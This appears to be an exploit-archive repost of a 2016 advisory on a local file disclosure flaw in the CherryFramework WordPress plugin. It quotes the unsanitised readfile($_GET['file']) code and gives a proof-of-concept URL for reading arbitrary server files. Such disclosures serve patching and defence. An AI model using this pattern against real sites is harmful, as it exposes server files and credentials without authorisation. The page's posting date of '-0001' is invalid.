Home / exploits Cherry Plugin - Local File Disclosure
Posted on 30 November -0001
<HTML><HEAD><TITLE>Cherry Plugin - Local File Disclosure</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>[-] Title : cherry plugin - Local File Disclosure [-] Author : Iran Security Team [-] Vendor : https://github.com/CherryFramework/cherry-plugin [-] Category : Webapps [-] Date : 28.November.2016 Vulnerable page : cherry-plugin/admin/import-export/download-content.php Vulnerable Source : 33: readfile readfile($file); 15: $file = $_GET['file'] : ''; POC : http://localhost/pach/admin/import-export/download-content.php?file=[LFD] ************************ * ==> Contact Me : * Telegram : @R4DIK4L * WebSilte : WwW.IrSecTeam.Org * Shahab R@DIK@L. ************************</BODY></HTML>